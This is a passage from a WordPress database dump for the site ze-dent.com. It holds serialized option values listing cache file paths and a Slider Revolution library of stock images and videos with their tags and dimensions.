.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:36;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-68a583d44a63d729135e8f4c73b2dc49.php\";i:37;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:38;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-a2b7cc2df975b99da7ff77508ddd1161.php\";i:39;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:40;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:41;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:42;s:135:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/rdf/wp-cache-bcc64e31237cd8e74b4d95641d493f32.php\";i:43;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:44;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-a2b7cc2df975b99da7ff77508ddd1161.php\";i:45;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-68a583d44a63d729135e8f4c73b2dc49.php\";i:46;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-79f7f75169c26729c3396977fa37781d.php\";i:47;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-cbe3d7fc10d2f4e099c43ee7233f72bb.php\";i:48;s:131:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/feed/wp-cache-a2b7cc2df975b99da7ff77508ddd1161.php\";i:49;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-68a583d44a63d729135e8f4c73b2dc49.php\";i:50;s:140:\"/var/www/vhosts/ze-dent.com/httpdocs/wp-content/cache/supercache/www.ze-dent.com/comments/feed/wp-cache-68a583d44a63d729135e8f4c73b2dc49.php\";}', 'yes');
INSERT INTO `zdenl_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(1615, 'rs-library', 'a:2:{s:7:\"objects\";a:179:{i:238;a:14:{s:2:\"id\";s:3:\"238\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:12:\"Mt_Baker.jpg\";s:5:\"video\";s:12:\"Mt_Baker.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Mt Baker \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:237;a:14:{s:2:\"id\";s:3:\"237\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:16:\"Two-Swimmers.jpg\";s:5:\"video\";s:16:\"Two-Swimmers.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Two Swimmers \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:236;a:14:{s:2:\"id\";s:3:\"236\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:14:\"Boats_Maze.jpg\";s:5:\"video\";s:14:\"Boats_Maze.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Boats Maze \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:235;a:14:{s:2:\"id\";s:3:\"235\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:18:\"Candolim-Beach.jpg\";s:5:\"video\";s:18:\"Candolim-Beach.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Candolim Beach \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:234;a:14:{s:2:\"id\";s:3:\"234\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:17:\"Working-Space.jpg\";s:5:\"video\";s:17:\"Working-Space.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:14:\"Working Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:233;a:14:{s:2:\"id\";s:3:\"233\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:9:\"Wavez.jpg\";s:5:\"video\";s:9:\"Wavez.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:6:\"Wavez \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:232;a:14:{s:2:\"id\";s:3:\"232\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:17:\"Coconut-Grove.jpg\";s:5:\"video\";s:17:\"Coconut-Grove.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:14:\"Coconut Grove \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:231;a:14:{s:2:\"id\";s:3:\"231\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:19:\"Very-Open-Space.jpg\";s:5:\"video\";s:19:\"Very-Open-Space.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Very Open Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:230;a:14:{s:2:\"id\";s:3:\"230\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:14:\"Office-Day.jpg\";s:5:\"video\";s:14:\"Office-Day.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Office Day \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:229;a:14:{s:2:\"id\";s:3:\"229\";s:4:\"type\";s:1:\"3\";s:6:\"handle\";s:12:\"The-Hill.jpg\";s:5:\"video\";s:12:\"The-Hill.mp4\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"The Hill \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";}i:198;a:13:{s:2:\"id\";s:3:\"198\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:16:\"object_dvd_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:3:\"DVD\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:43:17\";s:6:\"active\";s:1:\"1\";}i:197;a:13:{s:2:\"id\";s:3:\"197\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:17:\"relax_hammock.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Relax Hammock\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}i:1;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:196;a:13:{s:2:\"id\";s:3:\"196\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:16:\"beach_houses.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Beach Houses\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:195;a:13:{s:2:\"id\";s:3:\"195\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:17:\"forest_road_2.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Forest Road 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:194;a:13:{s:2:\"id\";s:3:\"194\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:14:\"clean_desk.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Clean Desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:193;a:13:{s:2:\"id\";s:3:\"193\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:19:\"mountain_view_6.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Mountain View 6\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1249\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:192;a:13:{s:2:\"id\";s:3:\"192\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:14:\"corn_field.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Corn Field\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1320\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:191;a:13:{s:2:\"id\";s:3:\"191\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:21:\"stylish_apartment.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:17:\"Stylish Apartment\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:190;a:13:{s:2:\"id\";s:3:\"190\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:24:\"hipster_coffee_house.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:20:\"Hipster Coffee House\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:189;a:13:{s:2:\"id\";s:3:\"189\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:16:\"blurry_beach.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Blurry Beach\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-10-17 12:41:12\";s:6:\"active\";s:1:\"1\";}i:188;a:13:{s:2:\"id\";s:3:\"188\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_plant_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:7:\"Plant 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";}i:187;a:13:{s:2:\"id\";s:3:\"187\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:16:\"object_pen_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:5:\"Pen 1\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";}i:186;a:13:{s:2:\"id\";s:3:\"186\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:17:\"greens_street.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Greens Street\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:185;a:13:{s:2:\"id\";s:3:\"185\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:10:\"desert.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:6:\"Desert\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:184;a:13:{s:2:\"id\";s:3:\"184\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:19:\"mountain_view_5.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Mountain View 5\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:183;a:13:{s:2:\"id\";s:3:\"183\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:10:\"laptop.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:6:\"Laptop\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1391\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:182;a:13:{s:2:\"id\";s:3:\"182\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:16:\"grand_canyon.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Grand Canyon\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1287\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:181;a:13:{s:2:\"id\";s:3:\"181\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:20:\"landscape_clouds.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Landscape Clouds\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1272\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:180;a:13:{s:2:\"id\";s:3:\"180\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:17:\"highway_night.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Highway Night\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"23\";s:6:\"handle\";s:5:\"Night\";s:4:\"name\";s:5:\"Night\";}i:1;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:179;a:13:{s:2:\"id\";s:3:\"179\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:15:\"beach_water.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Beach Water\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:177;a:13:{s:2:\"id\";s:3:\"177\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:15:\"woman_beach.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Woman Beach\";s:4:\"tags\";a:4:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:2;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:3;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:175;a:13:{s:2:\"id\";s:3:\"175\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:12:\"cool_guy.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:8:\"Cool Guy\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:174;a:13:{s:2:\"id\";s:3:\"174\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:13:\"beach_sea.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Beach Sea\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:2;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:173;a:13:{s:2:\"id\";s:3:\"173\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:17:\"bridge_clouds.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Bridge Clouds\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}i:2;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-09-05 15:29:22\";s:6:\"active\";s:1:\"1\";}i:172;a:13:{s:2:\"id\";s:3:\"172\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:16:\"object_egg_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:3:\"Egg\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-18 